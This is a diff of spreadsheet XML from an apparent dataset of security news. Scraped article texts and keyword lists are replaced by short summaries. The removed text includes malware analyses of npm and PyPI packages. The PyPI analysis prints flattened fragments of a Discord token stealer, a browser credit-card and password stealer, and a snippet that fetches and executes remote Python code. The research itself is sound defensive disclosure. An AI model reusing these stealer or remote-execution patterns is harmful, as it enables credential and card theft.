'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -4858,17 +4183,12 @@
       </c>
       <c r="C170" t="inlineStr">
         <is>
-          <t>skip main content official website united states government here’s know here’s know official websites website belongs official government organization united states secure websites https lock lock locked padlock https means you’ve safely connected website share sensitive information official secure websites protect2024 secure world shields report cyber issue cybersecurity infrastructure agency americas cyber defense agency search menu close topics topics cybersecurity best practices cyber threats advisories critical infrastructure resilience election emergency communications industrial control systems information communications technology supply chain partnerships collaboration physical risk management help government educational institutions industry state local tribal territorial individuals families small medium businesses find help locally faithbased community executives spotlight resources tools resources tools resources tools services programs resources training groups news events news events news events cybersecurity alerts advisories directives request cisa speaker congressional testimony cisa conferences cisa live careers careers benefits perks hirevue applicant reasonable accommodations process hiring resume application tips students recent graduates veteran military spouses work cisa culture divisions offices regions leadership business cisa site links reporting employee contractor misconduct cisa github year review year review contact protect2024 secure world shields report cyber issue americas cyber defense agency breadcrumb home news events cybersecurity advisories alert share alert kaseya supplychain ransomware attack last revised july cisa taking action understand address recent supplychain ransomware attack kaseya multiple managed service providers msps employ software cisa encourages organizations review kaseya advisory immediately follow guidance shutdown servers product provided subject notification privacy policy please share thoughts recently updated anonymous product survey we’d welcome feedback related advisories alert apple released updates safari macos alert cisa adds known exploited vulnerability catalog alert cisa releases four industrial control systems advisories alert cisa release secure design alert urge manufacturers eliminate injection vulnerabilities return topics spotlight resources tools news events careers cybersecurity infrastructure agency facebook twitter linkedin youtube instagram cisa central centralcisadhsgov seal cisagov official website department homeland cisa accessibility budget performance dhsgov foia requests fear office inspector general privacy policy subscribe white house usagov website feedback</t>
+          <t>It appears that attackers have carried out a supply chain ransomware attack by leveraging a vulnerability in Kaseya's VSA software against multiple managed service providers (MSP) -- and their customers.</t>
         </is>
       </c>
       <c r="D170" t="inlineStr">
         <is>
           <t>https://www.cisa.gov/uscert/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack</t>
-        </is>
-      </c>
-      <c r="E170" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'official', 'website', 'government', 'official', 'website', 'website', 'official', 'government', 'organization', 'website', 'https', 'lock', 'lock', 'padlock', 'https', 'website', 'sensitive', 'information', 'official', 'secure', 'website', 'secure', 'world', 'shield', 'report', 'cyber', 'issue', 'cybersecurity', 'infrastructure', 'agency', 'agency', 'search', 'menu', 'close', 'topic', 'topic', 'cybersecurity', 'good', 'practice', 'cyber', 'threat', 'critical', 'infrastructure', 'resilience', 'election', 'emergency', 'communication', 'industrial', 'control', 'system', 'information', 'communication', 'technology', 'supply', 'chain', 'partnership', 'physical', 'risk', 'management', 'government', 'educational', 'institution', 'industry', 'state', 'local', 'tribal', 'territorial', 'individual', 'family', 'small', 'medium', 'business', 'help', 'faithbased', 'community', 'executive', 'spotlight', 'resource', 'tool', 'resource', 'tool', 'resource', 'tool', 'service', 'program', 'resource', 'training', 'group', 'news', 'event', 'news', 'event', 'news', 'event', 'cybersecurity', 'alert', 'advisory', 'directive', 'cisa', 'speaker', 'congressional', 'testimony', 'cisa', 'conference', 'live', 'career', 'career', 'perk', 'applicant', 'reasonable', 'accommodation', 'process', 'resume', 'application', 'tip', 'student', 'recent', 'graduate', 'veteran', 'military', 'spouse', 'work', 'cisa', 'culture', 'division', 'office', 'region', 'leadership', 'business', 'cisa', 'site', 'link', 'employee', 'contractor', 'misconduct', 'year', 'review', 'contact', 'secure', 'world', 'shield', 'report', 'cyber', 'issue', 'news', 'event', 'cybersecurity', 'advisory', 'alert', 'share', 'alert', 'supplychain', 'ransomware', 'attack', 'cisa', 'taking', 'action', 'recent', 'supplychain', 'ransomware', 'attack', 'multiple', 'service', 'provider', 'msp', 'software', 'cisa', 'organization', 'kaseya', 'advisory', 'guidance', 'shutdown', 'server', 'product', 'subject', 'notification', 'privacy', 'policy', 'thought', 'anonymous', 'product', 'survey', 'feedback', 'advisory', 'alert', 'apple', 'update', 'cisa', 'vulnerability', 'catalog', 'alert', 'cisa', 'release', 'industrial', 'control', 'system', 'advisory', 'alert', 'cisa', 'release', 'secure', 'design', 'alert', 'urge', 'manufacturer', 'injection', 'vulnerability', 'topic', 'spotlight', 'resource', 'news', 'event', 'career', 'cybersecurity', 'infrastructure', 'agency', 'facebook', 'twitter', 'central', 'centralcisadhsgov', 'seal', 'cisagov', 'official', 'website', 'homeland', 'cisa', 'accessibility', 'budget', 'performance', 'dhsgov', 'foia', 'request', 'office', 'inspector', 'general', 'privacy', 'policy', 'subscribe', 'website', 'feedback']</t>
         </is>
       </c>
     </row>
@@ -4885,17 +4205,12 @@
       </c>
       <c r="C171" t="inlineStr">
         <is>
-          <t>buyer’s guide software supply chain download sboms moment hear make actionable save spot gartner® report mitigate enterprise software supply chain risks insights solutions software supply chain spectra assure procurement spectra assure build release automate support triage incident response siemsoar protect cloud file shares optimize hunting ransomware feed malware hunting sandbox email intelligence platform intelligence platform microsoft sentinel product technology product technology titanium platform spectra assure software supply chain reversinglabs intelligence reversinglabs elastic infrastructure reversinglabs analysis hunting free open source yara rules integrations partners partners become partner value added partners marketplaces alliances reversinglabs synopsys resources resources blog content library webinars software deconstruction demo series reversingglass concepts explained conversinglabs podcast labs yara rules demo videos learning reversinglabs company company leadership careers series investment company news events events press press releases news demo contact support login blog developer portal search reversinglabs blog research july groundhog package caught stealing browser passwords blog author karlo zanki reverse engineer reversinglabs read introduction years experts helped raise awareness threats targeting software release deployment management processes today almost everyone knows need protect publicly exposed services applications potential attacks outside wide range tools developed provide protection mechanisms threats sophisticated solutions deployed actors shifted focus spots defense measures weakest absent latest trends show software supply chain attacks become popular tactic actors sophistication levels commonly aimed providers lowlevel software components means infiltrate development organizations even subvert release process ways abusing level trust developers thirdparty code growing popularity software package repositories ease make perfect target developers reuse existing libraries implement needed functionality faster easier rarely make indepth assessments including project omission result overwhelming nature vast quantity potential issues found thirdparty code hence general packages quickly installed validate whether solve problem don’t move alternative dangerous practice lead incidental installation malicious software part continuous research reversinglabs periodically scans public package repositories track malicious attempts compromise software developers blog discusses process used find another package steals saved chrome browser passwords analysis package manager nodejs hosting million unique packages providing billion monthly package downloads entire repository processed using reversinglabs titanium platform static analysis engine following analysis shows beside expected textual javascript files also contains various types executable files macho… within packages large scale repository analysis platform recursively extracted packages used explainable machine learning algorithms detect embedded malware threats findings labeled win32infostealerheuristics seemed promising lead detection assigned embedded windows executable file following sha1 hash 881db33f855ab8e268d66c933689cdd32c40b694 aforementioned file found several versions nodejsnetserver package using static analysis metadata collected packages shows original name file “aexe” located inside “lib” folder hunting files filename consisting single letter extension immediately raise flag additional inspection detailed look particular case revealed “aexe” infact chromepass utility tool used recover passwords stored inside chrome browser figure screenshot chromepass tool isn’t malicious malicious context instance package uses perform malicious password stealing credential exfiltration even though offtheshelf password recovery tool comes graphical user interface malware authors like also command line might sound familiar previous blog posts disclosed similar password stealing executable found another package seems true tested techniques tendency repeat figure nodejsnetserver package summary repository pages nodejsnetserver package show latest version package v112 published months references package homepage repository lead nonexisting locations hosted github author package goes name chrunlee seems active developer github working repositories github account also contains link page hxxpschrunleecn author actively publishes blog posts related developer thematics figure chrunlee’s github profile version history shows package published versions totalling downloads since package first published february analysis follows details evolution process malicious package version number publish date table nodejsnetserver version history first version published test publishing process package three months later developer implemented remote shell functionality polished several subsequent versions april minor modifications shell functionality made versions finally december author made upgrade version adding script download aforementioned password stealing tool hosted personal website location hxxpschrunleecnaexe versions script modified teamviewerexe instead probably author didn’t want obvious connection malware website fact related versions contain password recovery tool package author accidentally published stored login credentials appears published versions repository include results testing chromepass tool author’s personal computer login credentials stored “atxt” file located folder password recovery tool named “aexe” textual file contains login credentials created march 20th december possibility least part passwords still valid validity wasn’t verified looking recovered credentials visible figure shows author didn’t always care best password policy practices figure passwords malware author recovered browser another interesting fact author intended trick targets execute malicious package cases malware placed package repositories attackers usually rely typosquatting disguise packages using names similar popular package could easily lure targets installing package case author took different approach decided abuse configuration options packages packages provide install executable files path providing “bin” field inside packagejson configuration file upon package installation symlink file prefixbin folder global installs nodemodulesbin folder local installs name assigned executables case module name already exists would overwritten mapped script provided malware even though requires “force” flag work case global installs isn’t necessary local package installations case hijacking target jstest package download stats show package downloaded times fairly popular package nodejs developer community downloads last days makes package really good target hijacking preferred testing executing command line instead using javascript files module figure abusing “bin” field inside packagejson execution hijacking package installation successful execution hijacking persistence accomplished installing libtestjs script windows service figure installation persistent windows service service opens socket listening incoming commands port supported commands include reverse host port configuration directory content listing file lookup file upload shell command execution screen camera recording screen camera recording accomplished using embedded ffmpeg executable browser password stealing accomplished shell command execution previously downloaded chromepass hacktool figure creation listening socket noted earlier homepage github repository links package lead nonexisting webpages looking packages published author chrunlee reveals another package nonexisting links package named tempdownloadtempfile version published june 17th contains packagejson filetestjs files filetestjs file implements remote shell functionality ones found different versions nodejsnetserver package package perform execution hijacking persistence mechanism makes purpose unclear conclusion software supply chain attacks becoming powerful strategy malicious actors community needs attention types threats everyone involved software development process needs understand malicious actors today trying compromise development process across stages developers targeted critical entry point organization client base frequent attack vectors targeting developers exploitation public package repositories repositories large number hosted packages offer good hiding place malware lurk repetitive discovery malicious packages repositories proven growing need solutions provide reliable identification protection types attacks reversinglabs continuously developing improving tools incorporated software development process provide reliable efficient detection software supply chain attacks powerful static analysis engine generate software report provides exact complete insight contents release package form software bill materials sbom report provides information possible unknown unexpected software dependencies unwanted licencing restrictions found thirdparty software addition indepth malware identification also provides early warning leaked sensitive information like private keys certificates powerful software behavior diffs released packages also compared previous versions observe recognize possibly unwanted changes code functionality every detected problem scored grade describing severity remediation complexity offers recommendation towards problem resolution reversinglabs software quality assurance report enables critical improvement tracking software development process report specifically designed developers looking take next step implementing best practices needed produce quality secure software example report package analyzed within blog found affected packages sha1 nodejsnetserver100 f79e03d904fafc5171392d2e54e10057780f9c25 nodejsnetserver101 9027433ef11506f349e9d89ec83d8050e669e3fb nodejsnetserver102 af2ec5a8e2a873e960f38d16e735dd9f52aa1e8b nodejsnetserver103 41b56bd5b7aaf6af3b9a35a9e47771708fddc172 nodejsnetserver104 3128ebd6c3e89dc2b5a7ecf95967a81a4cdde335 nodejsnetserver105 eb9cfe52e304702f1cf0fb1cc11dfc3fb1b0eab7 nodejsnetserver106 4b518b15db29eb9a0d8d11d1642f73e9da1275ca nodejsnetserver107 afe203e2d2cb295955915ba04edb079ae7697c62 nodejsnetserver108 6e9b1d8ce1bb49f0abc3bea62e0435912d35b458 nodejsnetserver110 9bf160389b0401435a2e5f8541688c1d5f877896 nodejsnetserver111 1be0fa1d44859e4c0bafc8317c1da1d4e897c1cc nodejsnetserver112 3cb0aeed9f260d38504677c834a5878b4eb59dc2 tempdownloadtempfile100 ffbefb79bd6b72a0e42bc04e03b9f63aa9e859e5 disclosure timeline contacted team nodejsnetserver tempdownloadtempfile packages team notified malware nodejsnetserver tempdownloadtempfile packages still haven’t removed repository team removes nodejsnetserver tempdownloadtempfile packages speed trends understand landscape state software supply chain plus learn reversinglabs spectra assure software supply chain keep learning update understanding buyers guide software supply chain join webinar need upgrade appsec report take action state supply chain join discussion state software supply chain webinar gartners guidance managing software supply chain risk tags research research blog posts appsec supply chain march software supply chain numbers stats matter understand state software supply chain takeaways recent research surveys application development pros read research march suspicious nuget package grabs data industrial systems espionage long driver malicious cyber campaigns heres research team knows suspicious sqzrframework480 campaign read devsecops march memorysafe languages design insights lessons learned memory safety stubborn dangerous software weaknesses insights takeaways google report issue read topics blog posts appsec supply chain devsecops research operations products technology company events follow youtube linkedin subscribe best blog delivered inbox weekly stay date trends analysis best practices across intelligence software supply chain special reports state software supply chain january latest blog posts securing medical devices sboms conversations hunting software supply chain reproducible builds graduate software supply chain glassboard conversations reversinglabs field ciso matt rose software package deconstruction video conferencing software analyzing risks software supply chain software supply chain hotline need immediate assistance software supply chain issue contact sscs incident response blog webinars demo videos events news glossary careers contact privacy policy cookies rights reserved reversinglabs</t>
+          <t>NPM malware has been caught stealing credentials from the Google Chrome web browser by using legitimate password recovery tools on Windows systems.</t>
         </is>
       </c>
       <c r="D171" t="inlineStr">
         <is>
           <t>https://blog.secure.software/groundhog-day-npm-package-caught-stealing-browser-passwords</t>
-        </is>
-      </c>
-      <c r="E171" t="inlineStr">
-        <is>
-          <t>['buyer', 'guide', 'software', 'supply', 'chain', 'download', 'moment', 'actionable', 'spot', 'report', 'enterprise', 'software', 'supply', 'chain', 'risk', 'insight', 'solution', 'software', 'supply', 'chain', 'procurement', 'spectra', 'build', 'release', 'automate', 'support', 'triage', 'incident', 'response', 'protect', 'cloud', 'file', 'share', 'ransomware', 'feed', 'sandbox', 'email', 'intelligence', 'platform', 'intelligence', 'platform', 'product', 'technology', 'product', 'technology', 'titanium', 'platform', 'assure', 'software', 'supply', 'chain', 'elastic', 'infrastructure', 'analysis', 'free', 'open', 'source', 'yara', 'rule', 'partner', 'partner', 'partner', 'value', 'partner', 'marketplace', 'alliance', 'resource', 'resource', 'blog', 'content', 'library', 'software', 'deconstruction', 'demo', 'series', 'reversingglass', 'concept', 'rule', 'video', 'company', 'company', 'leadership', 'career', 'series', 'investment', 'company', 'news', 'event', 'event', 'press', 'release', 'news', 'demo', 'contact', 'support', 'login', 'blog', 'developer', 'portal', 'search', 'reversinglab', 'blog', 'research', 'package', 'browser', 'password', 'blog', 'author', 'engineer', 'reversinglab', 'introduction', 'year', 'expert', 'awareness', 'threat', 'software', 'release', 'deployment', 'management', 'process', 'today', 'service', 'application', 'potential', 'attack', 'wide', 'range', 'tool', 'protection', 'mechanism', 'threat', 'sophisticated', 'solution', 'actor', 'focus', 'spot', 'defense', 'measure', 'weak', 'absent', 'late', 'trend', 'software', 'supply', 'chain', 'attack', 'popular', 'tactic', 'actor', 'sophistication', 'level', 'provider', 'lowlevel', 'software', 'component', 'development', 'organization', 'release', 'process', 'way', 'level', 'trust', 'developer', 'code', 'popularity', 'software', 'package', 'repository', 'perfect', 'target', 'developer', 'library', 'functionality', 'indepth', 'assessment', 'project', 'omission', 'nature', 'vast', 'quantity', 'potential', 'issue', 'thirdparty', 'code', 'general', 'package', 'problem', 'alternative', 'dangerous', 'practice', 'incidental', 'installation', 'malicious', 'software', 'part', 'continuous', 'research', 'public', 'package', 'repository', 'malicious', 'attempt', 'compromise', 'software', 'developer', 'blog', 'process', 'package', 'steal', 'chrome', 'password', 'package', 'manager', 'nodejs', 'unique', 'package', 'monthly', 'package', 'entire', 'repository', 'reversinglab', 'titanium', 'platform', 'static', 'analysis', 'engine', 'analysis', 'show', 'textual', 'javascript', 'file', 'various', 'type', 'executable', 'file', 'macho', 'package', 'large', 'scale', 'repository', 'analysis', 'platform', 'package', 'explainable', 'machine', 'learning', 'algorithm', 'malware', 'threat', 'finding', 'win32infostealerheuristic', 'promising', 'lead', 'detection', 'window', 'executable', 'file', 'hash', 'aforementioned', 'file', 'several', 'version', 'package', 'static', 'analysis', 'metadata', 'package', 'original', 'name', 'file', 'lib', 'folder', 'file', 'filename', 'single', 'letter', 'extension', 'flag', 'additional', 'inspection', 'look', 'particular', 'case', 'infact', 'chromepass', 'utility', 'tool', 'password', 'figure', 'screenshot', 'chromepass', 'tool', 'malicious', 'malicious', 'context', 'instance', 'package', 'malicious', 'password', 'credential', 'exfiltration', 'password', 'recovery', 'tool', 'graphical', 'user', 'author', 'command', 'line', 'familiar', 'previous', 'blog', 'post', 'similar', 'password', 'package', 'true', 'technique', 'tendency', 'repeat', 'figure', 'package', 'summary', 'repository', 'page', 'package', 'late', 'version', 'package', 'month', 'reference', 'package', 'homepage', 'repository', 'location', 'author', 'package', 'name', 'active', 'developer', 'repository', 'link', 'page', 'hxxpschrunleecn', 'author', 'blog', 'post', 'developer', 'thematic', 'figure', 'profile', 'version', 'history', 'package', 'version', 'totalling', 'download', 'package', 'analysis', 'detail', 'evolution', 'malicious', 'package', 'version', 'number', 'publish', 'date', 'table', 'history', 'first', 'version', 'test', 'publishing', 'process', 'package', 'month', 'developer', 'remote', 'shell', 'functionality', 'several', 'subsequent', 'version', 'minor', 'modification', 'shell', 'functionality', 'version', 'author', 'upgrade', 'version', 'script', 'download', 'password', 'tool', 'personal', 'website', 'location', 'version', 'script', 'author', 'obvious', 'connection', 'malware', 'website', 'fact', 'version', 'password', 'recovery', 'tool', 'package', 'author', 'login', 'credential', 'version', 'repository', 'result', 'chromepass', 'tool', 'author', 'personal', 'computer', 'login', 'credential', 'atxt', 'file', 'folder', 'password', 'recovery', 'tool', 'textual', 'file', 'login', 'credential', '20th', 'possibility', 'least', 'part', 'password', 'valid', 'validity', 'credential', 'visible', 'figure', 'author', 'good', 'password', 'policy', 'practice', 'password', 'author', 'interesting', 'fact', 'author', 'trick', 'target', 'malicious', 'package', 'case', 'malware', 'package', 'repository', 'attacker', 'disguise', 'package', 'name', 'similar', 'popular', 'package', 'target', 'package', 'case', 'author', 'different', 'approach', 'abuse', 'configuration', 'option', 'package', 'package', 'install', 'executable', 'file', 'path', 'bin', 'field', 'packagejson', 'configuration', 'file', 'package', 'installation', 'symlink', 'file', 'local', 'name', 'executable', 'case', 'module', 'name', 'script', 'malware', 'force', 'flag', 'work', 'case', 'global', 'install', 'necessary', 'local', 'package', 'installation', 'case', 'hijacking', 'target', 'jst', 'package', 'download', 'stat', 'package', 'time', 'popular', 'package', 'nodejs', 'developer', 'community', 'download', 'last', 'day', 'package', 'good', 'target', 'hijacking', 'preferred', 'testing', 'executing', 'command', 'line', 'javascript', 'file', 'module', 'figure', 'bin', 'field', 'packagejson', 'execution', 'hijacking', 'package', 'installation', 'successful', 'execution', 'hijacking', 'persistence', 'libtestjs', 'script', 'window', 'service', 'figure', 'installation', 'persistent', 'service', 'service', 'socket', 'incoming', 'command', 'port', 'command', 'reverse', 'host', 'port', 'configuration', 'directory', 'content', 'file', 'lookup', 'file', 'upload', 'shell', 'command', 'execution', 'screen', 'camera', 'recording', 'screen', 'camera', 'recording', 'ffmpeg', 'executable', 'password', 'shell', 'command', 'execution', 'chromepass', 'hacktool', 'figure', 'creation', 'listening', 'socket', 'early', 'homepage', 'link', 'package', 'lead', 'nonexisting', 'webpage', 'package', 'author', 'package', 'nonexisting', 'link', 'package', 'tempdownloadtempfile', 'version', '17th', 'packagejson', 'filetestjs', 'file', 'filetestjs', 'file', 'remote', 'shell', 'functionality', 'one', 'different', 'version', 'package', 'package', 'execution', 'hijacking', 'persistence', 'mechanism', 'purpose', 'unclear', 'conclusion', 'software', 'supply', 'chain', 'attack', 'powerful', 'strategy', 'malicious', 'actor', 'community', 'attention', 'type', 'software', 'development', 'process', 'malicious', 'actor', 'today', 'compromise', 'development', 'process', 'stage', 'developer', 'critical', 'entry', 'point', 'organization', 'client', 'base', 'frequent', 'attack', 'vector', 'developer', 'public', 'package', 'repository', 'repository', 'large', 'number', 'package', 'good', 'hiding', 'place', 'repetitive', 'discovery', 'malicious', 'package', 'repository', 'need', 'solution', 'reliable', 'identification', 'protection', 'type', 'attack', 'tool', 'software', 'development', 'process', 'reliable', 'efficient', 'detection', 'software', 'supply', 'chain', 'powerful', 'static', 'analysis', 'engine', 'software', 'report', 'exact', 'complete', 'insight', 'content', 'package', 'form', 'software', 'bill', 'material', 'sbom', 'report', 'information', 'possible', 'unknown', 'unexpected', 'software', 'unwanted', 'licencing', 'restriction', 'thirdparty', 'software', 'addition', 'indepth', 'malware', 'identification', 'early', 'warning', 'sensitive', 'information', 'private', 'key', 'certificate', 'powerful', 'software', 'behavior', 'package', 'previous', 'version', 'unwanted', 'change', 'code', 'functionality', 'problem', 'grade', 'severity', 'remediation', 'complexity', 'recommendation', 'problem', 'resolution', 'software', 'quality', 'assurance', 'report', 'critical', 'improvement', 'tracking', 'software', 'development', 'process', 'report', 'developer', 'take', 'next', 'step', 'good', 'practice', 'quality', 'secure', 'software', 'example', 'report', 'package', 'blog', 'affected', 'package', 'nodejsnetserver101', 'nodejsnetserver103', 'nodejsnetserver105', 'ffbefb79bd6b72a0e42bc04e03b9f63aa9e859e5', 'disclosure', 'timeline', 'team', 'tempdownloadtempfile', 'package', 'team', 'malware', 'package', 'repository', 'team', 'tempdownloadtempfile', 'package', 'speed', 'trend', 'landscape', 'state', 'software', 'supply', 'chain', 'spectra', 'assure', 'software', 'supply', 'chain', 'update', 'understanding', 'buyer', 'software', 'supply', 'chain', 'webinar', 'upgrade', 'report', 'action', 'state', 'supply', 'chain', 'discussion', 'state', 'software', 'supply', 'chain', 'webinar', 'gartner', 'guidance', 'software', 'supply', 'chain', 'risk', 'tag', 'research', 'research', 'blog', 'post', 'supply', 'chain', 'software', 'supply', 'chain', 'number', 'stat', 'state', 'software', 'supply', 'chain', 'recent', 'research', 'survey', 'application', 'development', 'pro', 'research', 'suspicious', 'nuget', 'package', 'data', 'industrial', 'system', 'long', 'driver', 'malicious', 'cyber', 'campaign', 'research', 'team', 'suspicious', 'sqzrframework480', 'campaign', 'devsecop', 'language', 'insight', 'lesson', 'memory', 'safety', 'stubborn', 'dangerous', 'software', 'weakness', 'insight', 'takeaway', 'issue', 'topic', 'blog', 'post', 'supply', 'chain', 'research', 'operation', 'product', 'technology', 'company', 'event', 'linkedin', 'subscribe', 'good', 'blog', 'inbox', 'weekly', 'date', 'trend', 'analysis', 'good', 'practice', 'intelligence', 'software', 'supply', 'chain', 'special', 'report', 'state', 'software', 'supply', 'chain', 'late', 'blog', 'post', 'medical', 'device', 'conversation', 'software', 'supply', 'chain', 'graduate', 'software', 'supply', 'chain', 'glassboard', 'conversation', 'field', 'software', 'package', 'deconstruction', 'video', 'conferencing', 'software', 'risk', 'software', 'supply', 'chain', 'software', 'supply', 'chain', 'hotline', 'immediate', 'assistance', 'software', 'supply', 'chain', 'issue', 'contact', 'response', 'blog', 'webinar', 'demo', 'video', 'news', 'glossary', 'career', 'contact', 'privacy', 'policy', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -4912,17 +4227,12 @@
       </c>
       <c r="C172" t="inlineStr">
         <is>
-          <t>products solutions pricing developers resources partners become jfrog partner find jfrog partner help community documentation integrations applications case cloud solutions hybrid cloud adoption mlsecops secure aiml model management devops artifact management tool consolidation cicd devsecops code scanning sast open source software managing vulnerabilities software composition analysis secrets detection containerinfra holistic software supply chain deviceiot connected device management industry financial services automotive industry healthcare services technology software gaming government learning guides jfrog help center research jfrog academy events webinars workshops devops consulting services devops certification state union report devops tools collateral resource center jfrog blog customer stories customer zone support customer support tickets community manage troubleshoot renew retrieve licenses legal myjfrog cloud customer portal cloud status service status event subscription jfrog trust protect data jfrog platform deliver trusted software speed software supply chain platform give endtoend visibility control automating delivery trusted releases bring together devops devsecops mlops teams single source truth view platform devops powering software powers world jfrog artifactory universal artifact model repository manager jfrog pipelines enterprise grade cicd workflow automation jfrog distribution fast secure distribution across consumption points devsecops securing software supply chain endtoend jfrog curation seamlessly curate software packages models jfrog essentials xray integrated software artifacts models jfrog advanced software supply chain exposure scanning realworld impact analysis device management jfrog connect device management devops agility contact start free products jfrog platform deliver trusted software speed software supply chain platform give endtoend visibility control automating delivery trusted releases bring together devops devsecops mlops teams single source truth view platform devops powering software powers world jfrog artifactory universal artifact model repository manager jfrog pipelines enterprise grade cicd workflow automation jfrog distribution fast secure distribution across consumption points devsecops securing software supply chain endtoend jfrog curation seamlessly curate software packages models jfrog essentials xray integrated software artifacts models jfrog advanced software supply chain exposure scanning realworld impact analysis device management jfrog connect device management devops agility solutions case cloud solutions hybrid cloud adoption mlsecops secure aiml model management devops artifact management tool consolidation cicd devsecops code scanning sast open source software managing vulnerabilities software composition analysis secrets detection containerinfra holistic software supply chain deviceiot connected device management industry financial services automotive industry healthcare services technology software gaming government pricing developers community documentation integrations applications resources learning guides jfrog help center research jfrog academy events webinars workshops devops consulting services devops certification state union report devops tools collateral resource center jfrog blog customer stories customer zone support customer support tickets community manage troubleshoot renew retrieve licenses legal myjfrog cloud customer portal cloud status service status event subscription jfrog trust protect data partners become jfrog partner find jfrog partner help blog home jfrog detects malicious pypi packages stealing credit cards injecting code andrey polkovnichenko omer kaspi shachar menashe july read share software package repositories becoming popular target supply chain attacks recently news malware attacks popular repositories like pypi rubygems developers blindly trusting repositories installing packages sources assuming secure sometimes malware packages allowed uploaded package repository giving malicious actors opportunity repositories distribute viruses launch successful attacks developer cicd machines pipeline part ongoing effort jfrog research team formerly vdoo automatically identify malicious packages reporting several python packages hosted pypi malicious alerted pypi existence malicious packages promptly removed based data pepytech estimate malicious packages downloaded times currently don’t data actual impact caused malicious packages blog post share technical analysis packages impact reported packages package name maintainer payload noblesse xin1111 discord token stealer credit card stealer windowsbased genesisbot xin1111 noblesse aryi xin1111 noblesse suffer suffer noblesse obfuscated pyarmor noblesse2 suffer noblesse noblessev2 suffer noblesse pytagora leonora123 remote code injection pytagora2 leonora123 pytagora technical analysis obfuscation techniques packages novice python malware simple obfuscation technique encoding python text simple encoder base64 evaluating decoded text code using eval example noblesse2 malware main code looks like import base64 codecs magic aw1wb3j0ignvbg9yyw1hlcbkyxrldgltzs love 0ilkocy3l4y2q1njkxpl97nje9y2eyoti0m a2luzy5hchblbmqodg9rzw4pdqogicagicag destiny yxikavdaaqk3xjpqwkqraboucbizqjems x72x6fx74x31x33 trust evalx6dx61x67x69x63 evalx63x6fx64x65x63x73x2ex64 evalcompilebase64b64decodeevalx74x72x75x73x74exec data truncated brevity obfuscation trick simple static analysis tool doesn’t stand thorough analysis actually raises flag make many researchers take closer look code specific nordic metal inspired strings used obfuscated code helped realize malware simply processed public tool pythonobfuscator packages aryi suffer obfuscated using pyarmor suggesting malware developers experimenting different obfuscation methods noblesse payload stealing discord auth tokens first payload noblesse “family” malwares stealing discord authentication tokens authentication token allows attacker impersonate user originally held token similar http session cookies payload stealing tokens based infamous dtgpg discord token grabber payload generator payload generator tool never released publicly payloads individualized token grabbers shared publicly examples also uploaded github discord auth token stealer code extremely simple iterates hardcoded paths local osgetenvlocalappdata roaming osgetenvappdata paths discord roaming discord discord canary roaming discordcanary discord roaming discordptb google chrome local googlechromeuser datadefault opera roaming opera softwareopera stable brave local bravesoftwarebravebrowseruser datadefault yandex local yandexyandexbrowseruser datadefault simply reads files paths specifically local sotrageleveldb looks discord authentication tokens looks like ahddanszfkkf2j2j8co2d5tng2rstlzp2e7xr3aiapa8onmgyqsao0fj1 singlefactor token chars chars chars mfazmdglwt6fvzvijc5xo25lupyvtrwqprylquvojn0kizz5uzwq1fbhyiatnj0sq3j4clsb7xibgzpauhec3mo multifactor token “mfa” chars results uploaded discord webhook easy automated messages data updates sent text channel private server following parameters type name captain hook avatar null channelid guildid applicationid null token uwagm7pqarojb3usundv1rt7ujzfidushbscy0p2qtchlznvgpg1vw2zatkfx8xqx noblesse payload stealing autocomplete sensitive data credit cards passwords second payload noblesse family “autocomplete” information stealer modern browsers support saving passwords credit card information user convenient downside information leaked malicious software access local machine case malware tries steal credit card information chrome masterkey master logindb osenvironuserprofile ossep rappdatalocalgooglechromeuser datadefaultweb data shutilcopy2logindb ccvaultdb conn sqlite3connectccvaultdb cursor conncursor cursorexecuteselect creditcards cursorfetchall username encryptedpassword decryptedpassword encryptedpassword masterkey expiremon expireyear hooksendfcardname username nnumber decryptedpassword nexpiry strexpiremon nexpiry strexpireyear additionally steal saved password credit card information edge truncated brevity logindb osenvironuserprofile ossep rappdatalocalmicrosoftedgeuser dataprofile 1login data cursorexecuteselect actionurl usernamevalue passwordvalue logins decryptedpassword dpwencryptedpassword masterkey username decryptedpassword hooksendfurl nuser username npassword decryptedpassword information uploaded webhook previously mentioned noblesse payload system information gathering third payload noblesse family gathers following information victim’s system uploads mentioned webhook address computer name user name windows license information wmic path softwarelicensingservice oa3xoriginalproductkey windows version wmic caption screenshot image using pillow’s imagegrab pytagora remote code injection malware family researched much simple interesting pretense “make pytagora theorem easy” entirety package’s code import math import base64sys hello execbase64b64decodeaw1wb3j0ihnvy2tldcxzdhj1y3qs hypotenuseab hello mathsqrtmathpowa2 mathpowb2 return roundc2 othercx mathsqrtmathpowc2mathpowx2 return roundy2 obfuscated code decoded snippet import socketstructtime ssocketsocket2socketsocketsocketsockstream sconnect1721660809009 lstructunpackisrecv40 print dsrecvl print lend1 dsrecvllend print execdss succinct malware tries connect private address port execute whatever python code read socket tips affected developers checking pypi dependencies identified noblesse clones locally installed suggest ​checking passwords saved edge changing compromised passwords respective website plus websites passwords reusedthe check performed opening edge navigating edgesettingspasswords full list saved passwords potentially compromised seen saved passwords checking credit cards saved chrome consider canceling credit cardsthe check performed opening chrome navigating chromesettingspayments full list saved credit cards potentially compromised seen payment methods identified pytagora clones locally installed machine unlikely infected malware suggest following usual malware checking steps running full scan installed antivirus software summary also seen previous pypi research lack moderation automated controls public software repositories allow even inexperienced attackers platform spread malware whether typosquatting dependency confusion simple social engineering attacks almost code snippets analyzed research based known public tools parameters changed obfuscation also based public 